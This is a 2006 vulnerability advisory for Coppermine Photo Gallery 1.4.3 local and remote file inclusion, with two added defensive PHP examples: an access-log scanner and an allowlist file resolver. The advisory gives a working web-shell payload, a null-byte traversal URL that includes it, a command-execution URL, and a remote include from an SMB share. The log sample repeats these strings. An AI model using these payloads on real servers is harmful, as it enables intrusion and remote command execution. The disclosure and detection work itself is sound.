Coppermine Photo Gallery <=1.4.3 remote code execution
- Coppermine Photo Gallery <= 1.4.3 arbitrary local/remote inclusion: ---------
- 18/02/2006 5.09.55 -----------------------------------------------------------
--------------------------------------------------------------------------------
software:
site: http://coppermine-gallery.net/index.php
description: "Coppermine is a multi-purpose fully-featured and integrated
web picture gallery script written in PHP using GD or ImageMagick as
image library with a MySQL backend."
--------------------------------------------------------------------------------
i)
Vulnerable code in include/init.inc.php near lines 308-343, processing the
"lang" argument:
...
// Process language selection if present in URI or in user profile or try
// autodetection if default charset is utf-8
if (!empty($_GET['lang']))
{
    $USER['lang'] = $_GET['lang']; // [!!!!!!!!!!!!!!]
}
if (isset($USER['lang']) && !strstr($USER['lang'], '/') && file_exists('lang/' . $USER['lang'] . '.php'))
{
    $CONFIG['default_lang'] = $CONFIG['lang']; // Save default language
    $CONFIG['lang'] = strtr($USER['lang'], '$/\\:*?"\'<>|`', '____________');
}
elseif ($CONFIG['charset'] == 'utf-8')
{
    include('include/select_lang.inc.php');
    if (file_exists('lang/' . $USER['lang'] . '.php'))
    {
        $CONFIG['default_lang'] = $CONFIG['lang']; // Save default language
        $CONFIG['lang'] = $USER['lang']; // [!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!]
    }
}
else
{
    unset($USER['lang']);
}
if (isset($CONFIG['default_lang']) && ($CONFIG['default_lang']==$CONFIG['lang']))
{
    unset($CONFIG['default_lang']);
}
if (!file_exists("lang/{$CONFIG['lang']}.php")) // [!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!]
    $CONFIG['lang'] = 'english';
// We load the chosen language file
require "lang/{$CONFIG['lang']}.php"; // [!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!]
...
Without being logged in, arbitrary local inclusion. Proof of concept:
Look at the lines marked [!!!!!]; the effective code path is:
...
$USER['lang'] = $_GET['lang'];
...
$CONFIG['lang'] = $USER['lang'];
...
if (!file_exists("lang/{$CONFIG['lang']}.php"))
    $CONFIG['lang'] = 'english';
...
require "lang/{$CONFIG['lang']}.php";
You only have to supply the path of an existing file using ../ and a null
byte... (regardless of the magic_quotes_gpc setting, because of Coppermine's
own code that disables magic quotes)
You will get no output (it is disabled), but you can proceed as follows:
upload a malicious zip file containing PHP code like this:
<?php
$suntzu=fopen("shell.php","w");
fputs($suntzu,"<?php system(\$HTTP_GET_VARS[CMD]);?>");
fclose($suntzu);
chmod("shell.php",777);
?>
Now:
http://[target]/[path]/thumbnails.php?lang=../albums/userpics/10002/shell.zip%00
(the content of .zip files is not checked the way images are, and in the
userpics/ folder there is a folder numbered 10000 + userid, so you can easily
and quickly brute-force the URL to find the malicious file)
If you succeed, you can run commands on the target system:
http://[target]/[path]/shell.php?CMD=ls%20-la
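As an added example, not part of the advisory, here is a small access-log scanner written from the defender's side. It flags the request shapes shown above (directory traversal and a %00 null byte in the lang parameter, a path into albums/userpics, and the later shell.php?CMD= request) and also the UNC and drive-letter shapes used against docs/showdoc.php in ii). The log lines, the /gallery/ path and the client addresses are constructed for the demo; nothing here is Coppermine code.

```php
<?php
// Added example (not from the advisory or Coppermine): scan access-log lines
// for the request patterns this advisory describes. The log below is a
// constructed sample in common log format.
$sample_log = <<<'LOG'
10.0.0.5 - - [18/Feb/2006:05:09:55 +0100] "GET /gallery/thumbnails.php?lang=english HTTP/1.1" 200 5120
10.0.0.7 - - [18/Feb/2006:05:10:01 +0100] "GET /gallery/thumbnails.php?lang=../albums/userpics/10002/shell.zip%00 HTTP/1.1" 200 0
10.0.0.7 - - [18/Feb/2006:05:10:09 +0100] "GET /gallery/shell.php?CMD=ls%20-la HTTP/1.1" 200 812
10.0.0.9 - - [18/Feb/2006:05:11:30 +0100] "GET /gallery/docs/showdoc.php?f=%5C%5C192.168.1.2%5Cc%5Cshell.php HTTP/1.1" 200 0
LOG;

// Return the list of findings for one log line; empty when nothing is suspicious.
function inspect_log_line(string $line): array
{
    if (!preg_match('/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return array();
    }
    $target = $m[1];
    $qpos   = strpos($target, '?');
    $path   = $qpos === false ? $target : substr($target, 0, $qpos);
    $query  = $qpos === false ? '' : substr($target, $qpos + 1);
    parse_str($query, $params);          // percent-decodes, so %00 becomes a NUL byte
    $findings = array();

    // The two parameters the advisory shows reaching include/require.
    foreach (array('lang', 'f') as $name) {
        if (!isset($params[$name]) || !is_string($params[$name])) {
            continue;
        }
        $value = $params[$name];
        if (strpos($value, "\0") !== false) {
            $findings[] = "$name: null byte";
        }
        if (preg_match('#(^|[\\\\/])\.\.([\\\\/]|$)#', $value)) {
            $findings[] = "$name: directory traversal";
        }
        if (preg_match('#^\\\\\\\\[^\\\\]+\\\\#', $value)) {
            $findings[] = "$name: UNC path";
        }
        if (preg_match('#^[A-Za-z]:[\\\\/]#', $value)) {
            $findings[] = "$name: absolute drive path";
        }
        if (preg_match('#albums/userpics/\d+/#', $value)) {
            $findings[] = "$name: points into an upload directory";
        }
    }
    // A CMD parameter on any script is what the dropped shell in the advisory takes.
    if (isset($params['CMD'])) {
        $findings[] = 'CMD parameter on ' . basename($path);
    }
    return $findings;
}

// Scan a whole log and return one report entry per suspicious line.
function scan_log(string $log): array
{
    $report = array();
    foreach (preg_split('/\R/', trim($log)) as $n => $line) {
        $findings = inspect_log_line($line);
        if ($findings) {
            preg_match('/^(\S+)/', $line, $ip);
            $report[] = array('line' => $n + 1, 'client' => $ip[1], 'findings' => $findings);
        }
    }
    return $report;
}

foreach (scan_log($sample_log) as $hit) {
    printf("line %d client %s: %s\n", $hit['line'], $hit['client'], implode('; ', $hit['findings']));
}
```

Run with php on the command line; lines 2, 3 and 4 of the sample are reported, line 1 is not. The check is done on the decoded query value, so %2e%2e and %5C variants are caught together with the literal forms, and a follow-up CMD request from the same client as an earlier traversal attempt is the sequence worth correlating.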
---------------------------------------------------------------------------------
ii)
Vulnerable code in docs/showdoc.php at line 21:
...
if (isset($_REQUEST['f'])) { $file = $_REQUEST['f']; } else { $file = ''; }
...
// harden against expolits: check the requested vars, replace illegal chars
$file = stripslashes($file); // [!]
$forbidden_chars = array("..", "/", "%", "<", ">", "$", "'", '"'); // [!!]
$file = str_replace($forbidden_chars, '', $file); // [!!!]
ob_start();
@include($file); // [!!!!]
...
PoC: http://[target]/[path]/docs/showdoc.php?f=c:\boot.ini
     http://[target]/[path]/docs/showdoc.php?f=\\192.168.1.2\c\shell.php
(the last one includes a file from a Samba share...)
If magic_quotes_gpc=on, "c:\\boot.ini" becomes "c:\boot.ini" after stripslashes
(because stripslashes does not remove all backslashes),
and "\\\\192.168.1.2\\c\\shell.php" becomes "\\192.168.1.2\c\shell.php".
PoC 2: http://[target]/[path]/docs/showdoc.php?f=c:\\boot.ini
       http://[target]/[path]/docs/showdoc.php?f=\\\\192.168.1.2\\c\\shell.php
If magic_quotes_gpc=off:
"f" becomes "c:\boot.ini" or "\\192.168.1.2\c\shell.php"
So you can include local and external (Samba) resources regardless of the
magic_quotes_gpc setting.
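Added example, not Coppermine's code: an allowlist-based resolver that would replace both the lang handling in i) and the character blacklist in docs/showdoc.php in ii). It accepts only a bare identifier and then checks with realpath that the file sits directly inside the intended directory, so the traversal, null-byte, drive-letter and UNC inputs from the proofs of concept are rejected independent of magic_quotes_gpc. The blacklist function is reproduced from the page only for contrast; the directory tree, file names and function names are assumptions made for the demo.

```php
<?php
// Added example (not Coppermine's code): resolve a request-supplied file name
// to an absolute path only if it passes an allowlist and a containment check.

// The filter from docs/showdoc.php, reproduced for contrast: it strips ".."
// and "/" but leaves "\", ":" and NUL bytes untouched.
function showdoc_blacklist_filter(string $file): string
{
    $forbidden_chars = array("..", "/", "%", "<", ">", "$", "'", '"');
    return str_replace($forbidden_chars, '', stripslashes($file));
}

// Allowlist: only a bare identifier is accepted; everything else falls back to
// $fallback (as the original lang code does) or is rejected when no fallback
// is given. The resolved path must then be a regular file directly in $base_dir.
function resolve_included_file(string $requested, string $base_dir, string $extension, ?string $fallback = null): ?string
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $requested)) {
        if ($fallback === null) {
            return null;
        }
        $requested = $fallback;
    }
    $base      = realpath($base_dir);
    $candidate = realpath($base_dir . DIRECTORY_SEPARATOR . $requested . $extension);
    if ($base === false || $candidate === false || !is_file($candidate)) {
        return null;
    }
    if (dirname($candidate) !== $base) {   // containment: no escape from $base_dir
        return null;
    }
    return $candidate;
}

// --- demo on a constructed directory tree -----------------------------------
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'cpg_allowlist_demo_' . getmypid();
mkdir($root . '/lang', 0700, true);
mkdir($root . '/docs', 0700, true);
file_put_contents($root . '/lang/english.php', "<?php // constructed language file\n");
file_put_contents($root . '/docs/index.htm', "<p>constructed doc</p>\n");
file_put_contents($root . '/shell.zip', "constructed attacker upload; must never resolve\n");

$inputs = array(
    'english',                          // legitimate
    '../shell.zip' . "\0",              // traversal plus NUL byte, as in i)
    'c:\\boot.ini',                     // absolute drive path, as in ii)
    '\\\\192.168.1.2\\c\\shell.php',    // UNC path, as in ii)
);
foreach ($inputs as $input) {
    $blacklist = showdoc_blacklist_filter($input);
    $lang      = resolve_included_file($input, $root . '/lang', '.php', 'english');
    $doc       = resolve_included_file($input, $root . '/docs', '.htm');
    printf("%-28s blacklist leaves: %-26s lang -> %-12s doc -> %s\n",
        addcslashes($input, "\0..\37\\"),
        addcslashes($blacklist, "\0..\37\\"),
        $lang === null ? 'rejected' : basename($lang),
        $doc === null ? 'rejected' : basename($doc));
}

// cleanup of the constructed tree
foreach (array('/lang/english.php', '/docs/index.htm', '/shell.zip') as $f) {
    unlink($root . $f);
}
rmdir($root . '/lang');
rmdir($root . '/docs');
rmdir($root);
```

The output shows the blacklist passing the drive-letter and UNC strings unchanged while the resolver returns english.php for every hostile lang value and rejects every hostile doc value. The regex check runs before any filesystem call, which also keeps NUL bytes away from realpath and is_file; the containment check is what protects a legitimately named file from being resolved through a symlink outside the directory.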
________________________________________________________________________________
Full proof-of-concept exploit for i) at this URL:
http://retrogod.altervista.org/cpg_143_incl_xpl.html
________________________________________________________________________________
rgod
site: http://retrogod.altervista.org
mail: rgod at autistici org
original advisory: http://retrogod.altervista.org/cpg_143_adv.html
--------------------------------------------------------------------------------